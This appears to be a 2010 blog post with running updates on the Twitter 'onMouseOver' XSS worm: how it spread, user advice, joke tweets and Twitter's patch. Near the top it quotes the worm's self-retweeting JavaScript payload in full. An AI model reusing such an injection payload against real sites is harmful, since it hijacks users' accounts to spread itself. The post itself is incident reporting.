Tag Archives: security

Twitter, Bugged? [Updated: 22/09/2010 11.00PM UTC +8:00]

📕 |

|

Twitter's Fail Whale

Many became very excited when they first experienced some delays and abnormality on Twitter.com (e.g. consistent fail whales, exceptionally long loads, messed up home page and etc) as they thought their chance of witnessing the #NewTwitter is on it’s way to them and… the excitement did not last for long

Little did they know that what seemed like an upgrade to Twitter.com recently turned sour for many just within the past 5 – 10 minutes where Twitter is reported to have been hacked / bugged / exploited by @masta. Those ‘contracted’ this disease automatically re-tweets the below:

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit();”class=”modal-overlay”/

It appears to be a string of a dysfunctional Javascript but it would seem that the link is actually masked and diverts curious cats to external sites (update #2: mostly porn sites).

I call it… the Twithack!

“How does it happen?”

It all starts with a simple rollover over links on Twitter.com as it would seem that @masta is using Javascript to do it’s client-side magic exploit with AJAX. This also means that you may want to steer away from the web service and rely on 3rd party apps such as Tweetdeck, Seesmic or any other tools that is to your liking.

“Oh no, I think I caught the bug! What do I do now?”

No lethal damage has been reported thus far so the main reason behind this exploit still remains unknown. Self publicity, perhaps? @masta got the world talking about him so he definitely succeed in that one.

[Update #1: this just in @ 10:12pm – 21st Sept 2010]

“Who or what is this @masta?”

Masta is the name of a viral Twitter XSS worm spread by@masta but is also said that it is not created by him. It is a rollover security flaw by Twitter, exploited by @masta to create this mass dissatisfaction among Twitter users worldwide – it is even trending right now!

A more descriptive definition from Mashable: The flaw uses a JavaScript function called onMouseOver which creates an event when the mouse is passed over a chunk of text. We’ve seen the flaw being abused to launch simple pop-up windows, redirect users elsewhere (including porn sites), and we’ve also seen it used in combination with blocks of color, covering the true “intention” of the tweet.

“Great, I’m re-tweeting the tweet too! Is my account hacked?”

As much as people think so, it is once again reported that your accounts are not “hacked” by any means (update #3: confirmed by Twitter). However, do not click on the re-tweeted links just in case!

“It there something or anything that I can do?”

Looks like that popular thing to do now is to block @masta on Twitter and delete the tweet. Also, watch what you rollover on Twitter.com!

[Update #2: this just in @ 12:30am – 22nd Sept 2010]

Twithacked!The news of the Twithack / exploit seem to be crossing borders by the second with many venting their frustration towards Twitter and @masta. Some even came up with their own reasoning for the hack just for laughs as below:

RT @Followcat: Twitter got hacked by a #Mouseover bug. “Mouse Over” is last thing I hear mice say on their walkie-talkies before I eat them.

RT @Lord_Voldemort7: Twitter got hacked. The birds got tired of taking shit from the whale & went rogue. The fail whale will now be replaced with the dark mark.

RT @BestWorstAdvice: Want to tell your ex how you really feel about them? Send them angry tweets and tell them “Sorry, my Twitter got hacked.”

RT @gthree_ca: Twitter got hacked?! Funny… everything else seems normal. I guess it wasn’t a sign of the apocalypse after all.

RT @official_shaw: Twitter got hacked today. Millions of twitterers were forced to talk to each other the old fashioned way. Through Facebook.

There are also a whole lot of them that are disappointed to have missed out the whole ‘epidemic’! To the rest, it may have been a fun experience.

Interestingly enough, it is reported that even Sarah Brown, wife of former British Prime Minister was also the victim of this new twitter attack. Sarah Brown’s Twitter page has been messed with in an attempt to redirect visitors to a hardc0re p0rn site based in Japan. That’s obviously bad news for her over one million of followers. As the links being re-tweeted were mostly directed to Japanese sites, it is suspected that it originated from Japan.

“What are the recommended things to do if I’m affected?”

Trending now:
1. Use Twitter only through 3rd party tools
2. Block @masta on Twitter
3. Remove tweets from your profile that has the Javascript links / codes
4. Change the password of your Twitter account (just in case) (update #3: exploit does not compromise account details)
5. Spread the news to inform those that are unaware!

[Update #3: this just in @ 2:30am – 22nd Sept 2010]

Case closed! Twitter finally responded indicating that they have things under control, followed by a message from the Twitter status blog saying “We’ve identified and are patching a XSS attack; as always, please message @safety if you have info regarding such an exploit”. It is mentioned that the mouseover security vulnerability was discovered a month back and was fixed but the recent update set the bug free again (and apparently it has nothing to do with the #NewTwitter)!

Twitter also indicated that “we are not aware of any issues related to it that would cause harm to computers or their accounts. And, there is no need to change passwords because user account information was not compromised through this exploit”, Which also means that whatever happened earlier was a surface job that does not affect the user records within Twitter’s database. Still no mention about the source or the intention, though..

Good to know that the problem was quickly resolved! Read up the full story from Twitter!

If you are still in the dark of what has been happening or was too afraid to do anything when the bug attacked, Sophos made a video to demonstrate the various errors that happened during that memorable duration:

[Update #4: this just in @ 11:00pm – 22nd Sept 2010]

A 17 year old boy from Australia claimed that he may be the cause of Twitter users being exposed to the epidemic yesterday. It was mentioned that he merely wanted to test if Javascript works on tweets which eventually led to the ‘announcement’ of it being possible.

However, the person who is likely THE person who actually created the havoc is suspected to be Masato Kinugawa, a Japanese developer as he was the one that initially reported this security flaw to Twitter on the 14th August which was patched.. until the recent upgrade where he may have found that it is now exploitable again.

“So all in all I would think that the entire sequence revolves around 2 geniuses that is wanting to test their skills using Twitter as a platform when they found a exploitable point. Let’s just hope that they are not up to something else!

“What’s next?”

We’ll be moving on in life, I’ll be off to visit Twitter.com and the birds will be tweeting their way through the new day on the web, yet again! :)